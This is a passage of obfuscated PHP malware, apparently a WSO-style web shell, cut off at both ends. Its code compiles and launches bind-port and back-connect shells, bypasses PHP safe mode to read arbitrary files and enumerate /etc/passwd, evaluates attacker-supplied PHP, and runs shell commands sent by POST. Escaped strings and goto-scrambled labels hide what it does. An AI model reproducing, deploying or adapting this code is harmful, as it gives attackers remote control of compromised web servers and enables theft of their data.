16\171\132\127\x46\x30\132\x53\102\172\x62\62\x4e\162\132\130\122\x63\142\151\111\67\104\x51\160\x7a\x5a\x58\x52\172\x62\62\x4e\x72\142\63\102\x30\x4b\106\115\163\125\x30\71\x4d\x58\x31\116\x50\x51\60\x74\106\x56\103\x78\x54\x54\61\x39\x53\122\x56\126\x54\x52\x55\106\x45\x52\x46\x49\163\115\x53\153\67\104\121\160\x69\x61\x57\x35\153\x4b\x46\x4d\163\143\62\x39\x6a\x61\62\106\x6b\x5a\110\x4a\x66\141\x57\64\x6f\x4a\x45\106\123\122\61\132\x62\x4d\106\x30\163\x53\125\x35\x42\122\105\x52\123\x58\x30\106\x4f\x57\x53\x6b\160\x49\110\170\70\111\x47\122\x70\x5a\123\x41\x69\121\62\106\165\x64\x43\102\166\143\x47\126\165\x49\110\102\x76\x63\x6e\122\143\x62\151\x49\x37\104\121\x70\x73\141\x58\116\60\x5a\x57\x34\x6f\x55\x79\167\x7a\x4b\123\x42\x38\146\x43\x42\x6b\141\127\125\x67\x49\153\x4e\150\142\156\x51\147\142\107\154\x7a\144\x47\x56\165\111\110\102\166\143\156\x52\x63\142\151\111\67\104\x51\x70\x33\x61\x47\154\x73\132\x53\147\x78\113\x53\x42\x37\x44\x51\x6f\112\131\127\116\152\x5a\x58\102\60\x4b\x45\116\120\124\153\x34\x73\x55\x79\x6b\67\x44\121\x6f\x4a\x61\x57\x59\x6f\111\123\147\153\x63\x47\x6c\153\x50\127\x5a\166\143\x6d\163\160\113\x53\102\x37\104\x51\x6f\112\103\127\122\160\132\123\101\151\121\62\106\165\142\x6d\71\60\111\107\x5a\166\143\x6d\163\x69\111\x47\154\x6d\x49\103\147\x68\132\107\126\155\141\x57\x35\154\132\103\x41\153\x63\x47\x6c\x6b\x4b\x54\x73\116\x43\x67\153\x4a\x62\x33\x42\x6c\x62\151\102\x54\x56\x45\122\x4a\x54\x69\x77\x69\x50\x43\132\104\x54\x30\65\117\111\152\163\x4e\x43\x67\x6b\112\142\63\102\154\x62\x69\102\x54\126\x45\x52\x50\126\126\x51\x73\111\152\x34\155\x51\60\x39\x4f\124\x69\111\67\104\x51\x6f\x4a\103\127\71\167\x5a\127\x34\x67\125\61\122\105\x52\126\x4a\123\x4c\103\111\53\x4a\153\x4e\x50\x54\x6b\x34\x69\x4f\167\x30\113\x43\x51\154\x6c\145\107\126\152\x49\x43\122\x54\123\105\x56\x4d\x54\x43\x42\x38\x66\x43\102\153\141\127\125\147\143\x48\x4a\160\142\156\x51\x67\121\x30\71\117\x54\151\101\x69\x51\62\106\165\144\103\102\154\145\x47\x56\x6a\x64\130\x52\x6c\111\103\122\124\123\105\126\x4d\124\x46\x78\165\x49\x6a\163\116\103\147\x6b\x4a\131\62\x78\x76\143\x32\x55\x67\x51\x30\71\x4f\124\152\163\116\x43\147\x6b\112\x5a\x58\x68\160\x64\103\101\167\x4f\167\60\113\103\x58\60\x4e\x43\156\x30\75"; echo "\74\150\x31\76\116\145\164\x77\157\x72\153\40\x74\157\157\x6c\163\x3c\x2f\150\61\76\x3c\x64\151\x76\x20\x63\x6c\141\x73\163\x3d\143\x6f\x6e\x74\145\156\x74\x3e\xa\x9\x3c\x66\157\x72\155\x20\x6e\x61\x6d\x65\x3d\x27\156\x66\160\47\40\x6f\156\123\x75\142\x6d\151\164\75\47\x67\x28\156\165\x6c\154\x2c\x6e\165\154\154\54\164\x68\x69\x73\x2e\165\x73\151\156\147\56\166\x61\154\165\145\x2c\x74\150\151\x73\56\160\157\x72\164\56\x76\x61\x6c\x75\x65\54\164\x68\x69\163\x2e\x70\141\x73\x73\56\166\141\x6c\165\x65\x29\73\162\x65\164\x75\162\x6e\x20\146\141\x6c\163\145\73\x27\x3e\xa\11\74\163\x70\x61\156\76\102\151\156\x64\40\x70\157\162\164\x20\x74\x6f\40\57\142\x69\156\x2f\163\150\x3c\x2f\x73\x70\x61\x6e\x3e\x3c\142\x72\57\x3e\xa\11\120\157\x72\x74\72\40\74\151\156\160\165\164\40\x74\171\160\145\x3d\x27\x74\145\x78\x74\x27\40\x6e\x61\x6d\x65\75\47\160\157\162\164\x27\40\x76\x61\x6c\165\145\75\47\x33\61\63\63\x37\47\x3e\40\x50\141\x73\163\x77\x6f\x72\144\72\x20\74\151\x6e\160\165\x74\x20\x74\x79\160\145\x3d\47\x74\145\170\x74\x27\40\x6e\141\x6d\x65\75\x27\x70\141\x73\163\47\76\40\125\x73\151\156\147\x3a\40\74\x6c\x61\142\145\154\x3e\x3c\x73\x65\154\x65\143\164\x20\x6e\141\155\x65\75\x27\x75\x73\x69\156\x67\47\76\x3c\x6f\x70\x74\x69\157\x6e\40\x76\141\x6c\x75\x65\x3d\47\x62\x70\143\x27\x3e\103\74\x2f\157\160\x74\151\157\156\76\x3c\x6f\x70\164\x69\x6f\156\x20\x76\x61\154\165\145\75\x27\x62\160\x70\x27\x3e\120\x65\162\154\74\x2f\157\160\164\151\157\x6e\76\74\57\163\x65\154\x65\143\164\76\74\57\x6c\141\142\x65\x6c\76\x20\x3c\151\x6e\x70\x75\164\40\x74\x79\x70\145\75\x73\165\x62\155\x69\x74\x20\166\x61\154\x75\x65\x3d\x27\x73\165\x62\155\151\164\x27\76\12\11\74\x2f\146\157\162\x6d\x3e\xa\x9\74\146\x6f\162\155\x20\x6e\x61\x6d\145\75\47\156\146\x70\47\40\157\156\123\x75\142\x6d\x69\x74\x3d\47\x67\x28\156\x75\x6c\154\x2c\156\x75\154\x6c\x2c\164\x68\151\x73\x2e\x75\163\x69\156\147\x2e\x76\x61\154\165\x65\x2c\x74\150\x69\163\56\x73\145\x72\x76\145\x72\56\166\x61\154\165\x65\54\x74\x68\x69\163\56\x70\157\x72\164\x2e\x76\141\x6c\x75\x65\x29\x3b\x72\145\164\165\162\x6e\x20\146\141\154\x73\145\73\47\x3e\12\x9\74\163\160\x61\156\x3e\x42\141\143\153\x2d\x63\157\156\x6e\x65\x63\164\x20\x74\157\74\x2f\x73\160\x61\x6e\76\74\x62\162\x2f\76\12\11\x53\x65\x72\x76\x65\x72\x3a\40\x3c\151\156\160\x75\164\40\x74\x79\160\x65\x3d\47\164\x65\170\164\47\40\156\x61\x6d\145\75\47\x73\145\162\x76\145\162\x27\40\x76\141\154\165\x65\x3d" . $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\104\x44\x52"] . "\x3e\x20\x50\157\162\x74\72\x20\x3c\x69\156\x70\165\164\40\x74\171\160\145\75\x27\164\145\x78\164\47\40\x6e\141\x6d\145\75\x27\160\x6f\x72\x74\47\40\x76\x61\x6c\165\x65\x3d\x27\63\x31\63\63\x37\x27\76\40\125\x73\x69\x6e\147\x3a\40\x3c\154\141\x62\145\x6c\76\74\x73\x65\154\145\x63\164\40\156\x61\x6d\145\x3d\47\165\163\151\156\147\x27\x3e\x3c\x6f\160\x74\151\x6f\x6e\x20\x76\141\154\x75\145\x3d\47\x62\143\143\x27\x3e\x43\74\x2f\x6f\x70\164\151\x6f\x6e\76\x3c\x6f\x70\x74\x69\x6f\x6e\x20\166\141\x6c\165\145\75\47\142\143\x70\47\x3e\120\x65\162\x6c\x3c\x2f\157\160\164\x69\x6f\156\x3e\74\x2f\163\x65\154\145\143\164\x3e\74\x2f\x6c\x61\x62\145\154\76\x20\74\x69\156\x70\x75\x74\x20\x74\x79\160\145\75\x73\165\x62\x6d\x69\x74\x20\166\141\x6c\x75\x65\75\x27\x73\165\142\x6d\x69\164\x27\76\xa\x9\x3c\57\x66\157\x72\155\x3e\x3c\x62\162\76"; if (isset($_POST["\x70\x31"])) { function cf($f, $t) { $w = @fopen($f, "\167") or @function_exists("\x66\x69\x6c\x65\137\x70\165\x74\137\x63\157\x6e\x74\145\x6e\x74\x73"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["\160\x31"] == "\x62\160\x63") { cf("\x2f\x74\x6d\160\57\x62\160\56\143", $bind_port_c); $ = ex("\147\143\143\40\x2d\x6f\40\57\x74\x6d\160\57\142\160\40\57\x74\155\160\57\x62\x70\x2e\x63"); @unlink("\x2f\x74\155\x70\x2f\142\x70\x2e\143"); $ .= ex("\x2f\x74\155\x70\x2f\x62\x70\40" . $_POST["\160\x32"] . "\x20" . $_POST["\160\63"] . "\x20\x26"); echo "\74\x70\x72\x65\x20\143\154\x61\163\163\75\155\x6c\61\x3e{$}" . ex("\x70\x73\40\141\165\x78\x20\174\x20\147\x72\x65\x70\40\142\160") . "\74\57\160\x72\x65\x3e"; } if ($_POST["\160\x31"] == "\x62\x70\x70") { cf("\x2f\164\155\160\57\x62\160\x2e\160\154", $bind_port_p); $ = ex(which("\x70\x65\x72\154") . "\x20\57\x74\155\x70\x2f\142\160\x2e\x70\x6c\x20" . $_POST["\x70\x32"] . "\x20\x26"); echo "\x3c\160\x72\145\40\x63\154\x61\x73\163\75\x6d\x6c\61\76{$}" . ex("\x70\163\40\x61\x75\x78\x20\x7c\40\147\x72\145\160\40\x62\160\x2e\x70\x6c") . "\74\57\160\162\145\76"; } if ($_POST["\x70\x31"] == "\142\143\143") { cf("\x2f\164\x6d\160\57\x62\x63\x2e\x63", $back_connect_c); $ = ex("\x67\x63\143\40\55\157\40\x2f\x74\155\x70\x2f\142\143\x20\x2f\164\155\160\x2f\142\x63\56\x63"); @unlink("\x2f\164\155\x70\57\142\x63\56\x63"); $ .= ex("\57\x74\155\160\57\x62\143\x20" . $_POST["\x70\x32"] . "\x20" . $_POST["\x70\63"] . "\x20\46"); echo "\74\x70\x72\x65\40\143\x6c\x61\x73\163\75\155\x6c\61\76{$}" . ex("\160\x73\40\141\x75\170\40\174\40\x67\x72\145\x70\x20\142\143") . "\x3c\57\x70\162\145\76"; } if ($_POST["\160\x31"] == "\142\143\160") { cf("\57\x74\155\160\x2f\x62\x63\x2e\160\x6c", $back_connect_p); $ = ex(which("\x70\x65\x72\x6c") . "\x20\57\164\x6d\160\x2f\142\143\56\x70\x6c\40" . $_POST["\160\62"] . "\x20" . $_POST["\160\x33"] . "\x20\x26"); echo "\x3c\160\162\x65\x20\x63\x6c\141\x73\x73\x3d\x6d\x6c\x31\x3e{$}" . ex("\160\163\x20\x61\x75\x78\x20\x7c\40\x67\162\x65\x70\x20\142\143\56\x70\x6c") . "\74\57\x70\x72\145\76"; } } echo "\74\57\144\151\x76\x3e"; hardFooter(); } goto PYh2w; aQUM2: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["\160\x31"]) { case 1: $temp = @tempnam($test, "\143\x78"); if (@copy("\x63\157\155\x70\x72\145\x73\163\56\x7a\154\151\142\72\57\x2f" . $_POST["\x70\62"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "\123\x6f\x72\162\171\56\x2e\56\x20\103\141\x6e\47\x74\40\157\x70\x65\x6e\40\x66\151\x6c\x65"; } break; case 2: $files = glob($_POST["\x70\x32"] . "\x2a"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\12"; } } break; case 3: $ch = curl_init("\x66\x69\154\145\x3a\x2f\57" . $_POST["\160\62"] . "\x0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("\x73\141\146\x65\137\x6d\x6f\x64\145"); ini_restore("\157\160\x65\x6e\137\x62\141\163\x65\x64\151\x72"); include $_POST["\x70\x32"]; break; case 5: for (; $_POST["\x70\62"] <= $_POST["\160\63"]; $_POST["\160\x32"]++) { $uid = @posix_getpwuid($_POST["\x70\62"]); if ($uid) { echo join("\72", $uid) . "\12"; } } break; case 6: if (!function_exists("\x69\x6d\141\160\137\157\160\x65\156")) { break; } $stream = imap_open($_POST["\160\62"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "\74\x68\61\x3e\123\x61\x66\x65\x20\155\157\x64\x65\40\142\171\x70\x61\x73\163\x3c\x2f\150\61\76\74\144\151\166\x20\143\x6c\x61\x73\163\75\x63\157\156\164\x65\156\164\x3e"; echo "\74\163\x70\x61\x6e\76\x43\x6f\x70\x79\40\x28\x72\x65\x61\x64\40\146\151\154\145\x29\x3c\57\x73\x70\141\156\76\x3c\x66\x6f\162\x6d\x20\157\x6e\163\x75\x62\x6d\x69\x74\75\x27\147\x28\x6e\165\x6c\154\54\156\165\154\154\x2c\x22\61\x22\x2c\x74\x68\151\163\56\x70\x61\162\141\155\x2e\166\x61\154\x75\145\x29\73\162\145\164\x75\162\156\x20\146\141\x6c\163\x65\73\47\76\74\x69\x6e\160\x75\164\x20\x63\x6c\141\x73\x73\75\42\x74\157\x6f\x6c\x73\111\156\x70\42\x20\164\171\160\145\75\x74\145\170\x74\40\156\x61\x6d\145\75\x70\x61\x72\141\155\x3e\x3c\x69\156\x70\x75\x74\x20\x74\171\x70\145\x3d\x73\165\x62\x6d\151\x74\40\166\x61\x6c\x75\x65\75\x22\x73\165\142\155\151\164\42\76\x3c\x2f\x66\x6f\x72\x6d\x3e\x3c\142\x72\x3e\74\163\160\141\x6e\x3e\107\x6c\157\x62\x20\50\154\x69\163\x74\40\144\x69\x72\51\74\57\x73\160\141\156\x3e\x3c\146\157\162\x6d\x20\157\156\x73\165\142\x6d\x69\164\75\x27\x67\x28\x6e\165\x6c\x6c\54\156\x75\x6c\x6c\x2c\x22\x32\42\x2c\164\x68\x69\x73\56\x70\x61\162\141\155\56\166\141\x6c\x75\145\x29\73\162\145\164\x75\x72\156\x20\146\141\154\x73\145\73\x27\76\x3c\x69\x6e\160\x75\164\40\x63\154\141\163\x73\75\x22\x74\x6f\x6f\x6c\x73\111\x6e\x70\x22\x20\164\x79\160\x65\75\164\x65\170\x74\x20\x6e\x61\155\x65\75\x70\x61\162\x61\x6d\x3e\74\151\x6e\160\x75\164\x20\x74\x79\160\145\x3d\x73\x75\x62\155\151\164\x20\x76\x61\154\165\145\x3d\x22\163\x75\142\155\x69\x74\x22\x3e\x3c\57\146\157\x72\155\76\74\x62\162\76\74\163\x70\141\156\x3e\103\165\162\x6c\x20\50\x72\145\141\144\x20\146\151\x6c\x65\51\x3c\x2f\x73\160\x61\x6e\x3e\74\146\157\162\x6d\40\157\x6e\163\x75\x62\x6d\151\x74\x3d\47\x67\50\x6e\x75\x6c\x6c\x2c\156\x75\x6c\x6c\54\x22\x33\x22\54\x74\150\x69\x73\x2e\160\141\x72\x61\x6d\x2e\166\x61\x6c\x75\x65\51\73\162\145\164\x75\162\x6e\40\146\x61\154\163\145\x3b\47\x3e\x3c\151\156\x70\165\x74\x20\143\154\141\x73\x73\x3d\x22\164\x6f\157\x6c\x73\111\156\x70\42\40\x74\171\160\145\75\164\x65\x78\x74\x20\156\x61\155\x65\75\160\141\162\141\x6d\76\74\151\156\160\x75\x74\x20\164\x79\160\x65\x3d\163\x75\142\x6d\151\164\x20\x76\141\154\x75\x65\x3d\x22\x73\x75\142\x6d\151\x74\x22\76\x3c\x2f\146\x6f\x72\155\76\74\x62\162\76\74\x73\x70\x61\x6e\x3e\x49\156\x69\137\162\145\163\164\x6f\162\x65\40\x28\x72\x65\141\x64\x20\146\x69\154\145\51\x3c\57\x73\x70\141\x6e\x3e\x3c\x66\157\162\155\x20\x6f\x6e\163\x75\142\x6d\151\x74\75\47\x67\x28\x6e\x75\154\x6c\54\156\x75\154\x6c\x2c\x22\x34\x22\54\164\x68\151\163\56\160\141\162\141\x6d\x2e\166\x61\x6c\x75\x65\x29\x3b\x72\x65\164\x75\162\156\x20\x66\141\154\163\x65\73\47\76\x3c\151\x6e\x70\x75\164\x20\x63\154\x61\163\163\x3d\42\164\157\x6f\x6c\163\111\x6e\x70\42\40\x74\x79\160\145\75\164\145\x78\x74\40\x6e\141\x6d\x65\x3d\160\141\x72\141\155\76\x3c\x69\156\x70\165\x74\x20\x74\x79\160\x65\75\x73\165\x62\155\151\x74\x20\166\141\154\x75\x65\75\x22\163\x75\x62\x6d\151\164\x22\76\74\57\x66\x6f\162\155\76\x3c\142\162\76\74\163\160\x61\156\x3e\120\x6f\163\151\x78\137\147\145\164\x70\x77\x75\x69\144\40\x28\x22\122\x65\x61\x64\42\x20\x2f\x65\x74\143\57\x70\x61\163\163\167\x64\51\74\x2f\x73\x70\x61\x6e\76\x3c\x74\x61\142\x6c\145\x3e\74\x66\x6f\x72\155\x20\x6f\x6e\163\165\x62\x6d\151\x74\75\x27\147\50\156\165\x6c\x6c\x2c\156\x75\x6c\x6c\54\x22\65\x22\54\x74\150\x69\x73\x2e\x70\x61\x72\141\x6d\61\56\166\141\x6c\165\145\x2c\164\x68\151\163\x2e\160\141\162\141\x6d\x32\56\x76\141\x6c\x75\145\51\73\x72\x65\x74\165\x72\156\40\146\141\x6c\163\145\x3b\x27\x3e\74\x74\x72\x3e\x3c\x74\x64\76\x46\x72\x6f\x6d\x3c\57\x74\x64\76\74\164\144\x3e\x3c\151\x6e\x70\165\164\40\x74\171\x70\x65\75\x74\x65\170\x74\x20\156\x61\155\145\75\160\x61\162\x61\x6d\61\40\166\141\154\x75\145\x3d\x30\x3e\x3c\x2f\164\144\x3e\x3c\x2f\x74\x72\76\74\164\x72\76\74\x74\144\76\x54\157\74\57\164\144\76\x3c\x74\x64\76\x3c\151\x6e\x70\165\x74\40\164\171\x70\145\x3d\164\x65\170\164\x20\156\141\x6d\145\75\160\x61\162\141\x6d\62\40\x76\141\154\x75\x65\x3d\61\x30\x30\60\x3e\x3c\x2f\x74\144\76\x3c\x2f\164\x72\76\74\57\164\x61\x62\x6c\x65\76\74\x69\156\x70\x75\x74\x20\x74\x79\x70\145\75\x73\165\x62\155\x69\x74\40\x76\141\154\x75\x65\75\42\163\x75\x62\x6d\x69\164\x22\x3e\74\x2f\146\x6f\x72\x6d\x3e\74\x62\162\76\74\x62\x72\x3e\x3c\163\x70\141\156\76\x49\x6d\141\160\x5f\x6f\160\145\156\x20\x28\162\x65\x61\144\40\x66\151\x6c\145\51\x3c\x2f\163\x70\x61\x6e\76\74\x66\157\x72\155\40\x6f\x6e\163\165\142\155\x69\164\75\x27\147\50\x6e\165\154\x6c\x2c\x6e\x75\x6c\154\54\42\66\42\54\164\x68\x69\x73\x2e\x70\141\x72\141\155\56\x76\x61\154\x75\x65\51\x3b\x72\145\164\x75\x72\x6e\40\x66\141\154\x73\x65\x3b\47\76\x3c\x69\156\x70\165\164\40\x74\x79\x70\145\x3d\x74\145\x78\x74\40\156\x61\155\x65\75\160\x61\162\141\155\x3e\74\x69\156\x70\x75\x74\40\164\x79\160\x65\x3d\x73\x75\142\155\x69\x74\40\x76\141\x6c\x75\x65\x3d\42\x73\165\x62\x6d\x69\164\x22\76\74\x2f\x66\157\x72\x6d\x3e"; if ($temp) { echo "\74\x70\162\145\x20\143\154\141\x73\163\x3d\42\155\x6c\x31\42\x20\x73\164\171\154\145\x3d\42\155\x61\x72\x67\151\156\55\164\x6f\x70\x3a\x35\160\x78\x22\x20\151\x64\x3d\42\x4f\165\x74\160\x75\164\42\76" . $temp . "\74\x2f\x70\162\145\76"; } echo "\74\x2f\x64\x69\x76\x3e"; hardFooter(); } goto W_qyb; YQzoR: function viewSize($s) { if ($s >= 1073741824) { return sprintf("\45\61\x2e\x32\146", $s / 1073741824) . "\40\x47\x42"; } elseif ($s >= 1048576) { return sprintf("\x25\x31\x2e\62\x66", $s / 1048576) . "\40\115\102"; } elseif ($s >= 1024) { return sprintf("\x25\x31\56\62\146", $s / 1024) . "\x20\113\x42"; } else { return $s . "\x20\x42"; } } goto XXfsY; WMTEU: function actionPhp() { if (isset($_POST["\141\x6a\141\x78"])) { $_COOKIE[md5($_SERVER["\x48\x54\x54\x50\x5f\110\x4f\123\x54"]) . "\x61\152\x61\170"] = true; ob_start(); eval($_POST["\160\x31"]); $temp = "\x64\157\143\165\155\x65\156\x74\56\x67\145\x74\105\154\x65\155\145\156\164\x42\171\x49\x64\x28\x27\120\x68\160\x4f\x75\164\x70\x75\164\x27\51\56\163\x74\x79\x6c\145\x2e\x64\151\163\x70\x6c\x61\171\75\47\47\x3b\144\x6f\143\x75\155\x65\x6e\164\56\147\x65\164\x45\154\145\x6d\145\156\x74\x42\171\x49\144\50\x27\x50\x68\x70\117\165\164\x70\x75\x74\47\x29\x2e\151\156\156\145\x72\110\x54\x4d\114\75\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd\11\134\47\0") . "\x27\x3b\12"; echo strlen($temp), "\12", $temp; die; } hardHeader(); if (isset($_POST["\160\62"]) && $_POST["\160\62"] == "\x69\x6e\146\157") { echo "\74\150\61\x3e\120\x48\120\40\x69\156\146\157\74\57\x68\x31\x3e\74\144\x69\x76\40\x63\154\141\163\x73\x3d\x63\157\x6e\164\145\x6e\164\x3e"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("\41\142\x6f\144\x79\40\x7b\x2e\52\x7d\41\x6d\163\151\125", '', $tmp); $tmp = preg_replace("\41\x61\72\134\167\x2b\x20\x7b\56\x2a\175\41\155\x73\x69\x55", '', $tmp); $tmp = preg_replace("\x21\x68\61\41\x6d\x73\151\125", "\150\x32", $tmp); $tmp = preg_replace("\x21\164\144\54\40\x74\x68\40\173\50\56\x2a\x29\175\x21\x6d\x73\151\x55", "\56\x65\54\40\x2e\x76\x2c\x20\x2e\x68\54\x20\x2e\x68\x20\x74\150\40\173\44\61\175", $tmp); $tmp = preg_replace("\41\142\157\144\x79\54\x20\x74\144\x2c\40\x74\x68\x2c\40\150\x32\x2c\x20\150\x32\40\173\x2e\x2a\175\x21\155\x73\x69\125", '', $tmp); echo $tmp; echo "\x3c\57\x64\151\166\76\74\x62\x72\x3e"; } if (empty($_POST["\x61\x6a\141\170"]) && !empty($_POST["\x70\x31"])) { $_COOKIE[md5($_SERVER["\110\124\x54\x50\x5f\110\117\x53\124"]) . "\x61\152\x61\170"] = false; } echo "\x3c\150\61\x3e\x45\170\145\143\x75\x74\151\x6f\156\40\120\x48\120\x2d\143\157\x64\x65\x3c\x2f\x68\x31\x3e\x3c\144\151\166\x20\x63\154\x61\163\163\75\x63\157\x6e\164\x65\x6e\164\76\74\146\157\x72\155\40\x6e\141\x6d\145\x3d\160\146\40\x6d\145\164\150\x6f\144\75\x70\157\x73\164\x20\157\156\x73\165\x62\155\151\x74\x3d\x22\151\146\x28\164\x68\x69\163\x2e\x61\x6a\x61\x78\56\143\x68\x65\x63\153\145\x64\51\173\x61\x28\156\165\x6c\154\x2c\x6e\x75\154\x6c\x2c\x74\x68\151\163\56\143\x6f\144\145\x2e\166\x61\x6c\x75\x65\x29\73\175\x65\x6c\x73\145\173\x67\x28\x6e\165\x6c\x6c\54\156\x75\x6c\154\x2c\164\150\x69\x73\56\143\157\x64\145\56\166\141\154\x75\145\x2c\47\47\x29\x3b\175\x72\145\x74\165\162\156\x20\x66\141\154\x73\145\x3b\x22\76\x3c\164\145\170\x74\x61\x72\x65\x61\40\156\141\x6d\145\75\143\x6f\144\145\x20\143\154\141\x73\163\75\x62\151\x67\x61\162\145\x61\40\151\144\x3d\x50\x68\x70\x43\157\x64\145\x3e" . (!empty($_POST["\160\61"]) ? htmlspecialchars($_POST["\x70\61"]) : '') . "\74\x2f\164\x65\170\164\141\x72\x65\141\x3e\74\x69\156\160\165\164\40\x74\x79\160\x65\75\x73\x75\142\x6d\151\x74\40\166\141\x6c\x75\145\x3d\105\166\141\154\40\x73\164\x79\154\145\75\42\155\141\162\147\151\x6e\55\164\157\x70\x3a\x35\x70\x78\42\x3e"; echo "\x20\74\151\156\x70\x75\x74\x20\x74\x79\x70\145\75\143\x68\x65\143\x6b\142\157\170\x20\x6e\x61\155\145\x3d\141\x6a\x61\x78\x20\x76\x61\154\165\x65\x3d\61\40" . ($_COOKIE[md5($_SERVER["\x48\x54\124\x50\x5f\x48\117\x53\124"]) . "\x61\x6a\x61\170"] ? "\143\x68\x65\143\x6b\x65\144" : '') . "\76\40\163\145\156\144\40\165\163\x69\x6e\x67\x20\x41\x4a\101\x58\x3c\x2f\146\x6f\x72\155\76\74\160\162\x65\40\151\144\x3d\120\150\x70\x4f\x75\x74\160\x75\164\40\x73\164\x79\154\x65\75\42" . (empty($_POST["\x70\61"]) ? "\x64\x69\163\160\x6c\x61\x79\72\x6e\157\156\x65\x3b" : '') . "\x6d\x61\x72\147\151\156\x2d\x74\x6f\160\72\x35\x70\170\x3b\x22\40\143\x6c\141\163\x73\75\155\x6c\x31\76"; if (!empty($_POST["\160\x31"])) { ob_start(); eval($_POST["\x70\61"]); echo htmlspecialchars(ob_get_clean()); } echo "\x3c\x2f\160\x72\145\x3e\74\57\144\151\x76\x3e"; hardFooter(); } goto KOaKG; hJVFy: if (!isset($_POST["\156\x65"])) { if (isset($_POST["\x61"])) { $_POST["\141"] = iconv("\x75\x74\x66\x2d\70", $_POST["\143\x68\141\x72\x73\x65\164"], decrypt($_POST["\141"], $_COOKIE[md5($_SERVER["\110\124\x54\x50\x5f\x48\x4f\123\x54"]) . "\x6b\145\x79"])); } if (isset($_POST["\143"])) { $_POST["\x63"] = iconv("\165\x74\146\55\70", $_POST["\x63\x68\141\x72\163\145\164"], decrypt($_POST["\143"], $_COOKIE[md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\x54"]) . "\x6b\x65\171"])); } if (isset($_POST["\x70\x31"])) { $_POST["\160\x31"] = iconv("\165\164\146\x2d\70", $_POST["\143\150\x61\162\x73\x65\x74"], decrypt($_POST["\160\x31"], $_COOKIE[md5($_SERVER["\x48\124\124\120\x5f\x48\117\123\x54"]) . "\153\x65\171"])); } if (isset($_POST["\160\62"])) { $_POST["\x70\x32"] = iconv("\x75\164\146\x2d\70", $_POST["\x63\x68\x61\162\163\145\x74"], decrypt($_POST["\x70\x32"], $_COOKIE[md5($_SERVER["\110\x54\x54\120\137\x48\x4f\x53\x54"]) . "\153\145\171"])); } if (isset($_POST["\160\x33"])) { $_POST["\160\x33"] = iconv("\165\164\146\55\x38", $_POST["\x63\x68\141\x72\163\x65\164"], decrypt($_POST["\x70\63"], $_COOKIE[md5($_SERVER["\x48\124\124\x50\137\110\117\123\124"]) . "\x6b\145\171"])); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("\163\141\146\145\x5f\155\x6f\x64\x65"); goto AH6j_; p2UEO: @ini_set("\145\x72\x72\x6f\x72\137\154\157\147", NULL); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "\x73"; } elseif (($p & 40960) == 40960) { $i = "\154"; } elseif (($p & 32768) == 32768) { $i = "\x2d"; } elseif (($p & 24576) == 24576) { $i = "\x62"; } elseif (($p & 16384) == 16384) { $i = "\x64"; } elseif (($p & 8192) == 8192) { $i = "\143"; } elseif (($p & 4096) == 4096) { $i = "\160"; } else { $i = "\x75"; } $i .= $p & 256 ? "\162" : "\55"; $i .= $p & 128 ? "\167" : "\55"; $i .= $p & 64 ? $p & 2048 ? "\x73" : "\x78" : ($p & 2048 ? "\x53" : "\x2d"); $i .= $p & 32 ? "\162" : "\x2d"; $i .= $p & 16 ? "\167" : "\55"; $i .= $p & 8 ? $p & 1024 ? "\163" : "\x78" : ($p & 1024 ? "\x53" : "\55"); $i .= $p & 4 ? "\162" : "\x2d"; $i .= $p & 2 ? "\x77" : "\55"; $i .= $p & 1 ? $p & 512 ? "\164" : "\170" : ($p & 512 ? "\x54" : "\x2d"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["\160\61"]) && !empty($_POST["\160\62"])) { prototype(md5($_SERVER["\110\124\x54\x50\137\x48\x4f\x53\x54"]) . "\163\164\x64\x65\162\162\x5f\164\x6f\137\157\165\x74", true); $_POST["\160\x31"] .= "\40\62\76\x26\61"; } elseif (!empty($_POST["\x70\x31"])) { prototype(md5($_SERVER["\110\x54\x54\x50\x5f\110\117\123\x54"]) . "\x73\164\144\145\x72\162\137\x74\x6f\137\x6f\165\164", 0); } if (isset($_POST["\x61\152\141\170"])) { prototype(md5($_SERVER["\x48\x54\x54\x50\x5f\x48\117\x53\124"]) . "\x61\152\x61\170", true); ob_start(); echo "\x64\x2e\x63\x66\x2e\x63\155\x64\56\166\x61\x6c\165\x65\x3d\47\47\x3b\xa"; $temp = @iconv($_POST["\x63\150\141\162\x73\145\164"], "\x55\x54\106\55\70", addcslashes("\xa\x24\x20" . $_POST["\160\x31"] . "\xa" . ex($_POST["\x70\61"]), "\xa\xd\x9\134\x27\x0")); if (preg_match("\x21\56\52\x63\144\x5c\x73\53\x28\133\x5e\x3b\x5d\53\x29\44\x21", $_POST["\160\61"], $match)) { if (@chdir($match[1])) { $GLOBALS["\143\x77\x64"] = @getcwd(); echo "\143\x5f\x3d\47" . $GLOBALS["\x63\x77\144"] . "\47\73"; } } echo "\144\x2e\x63\x66\x2e\x6f\165\164\160\165\x74\56\166\x61\154\x75\145\x2b\75\x27" . $temp . "\x27\73"; echo "\144\56\143\146\x2e\157\165\x74\x70\165\164\56\163\x63\162\157\x6c\154\124\157\x70\40\x3d\40\x64\x2e\x63\146\56\x6f\165\x74\160\165\164\56\x73\x63\x72\157\x6c\154\x48\x65\x69\x67\x68\x74\73"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["\141\x6a\141\x78"]) && !empty($_POST["\160\61"])) { prototype(md5($_SERVER["\110\124\x54\x50\137\110\117\123\x54"]) . "\141\152\x61\170", 0); } hardHeader(); echo 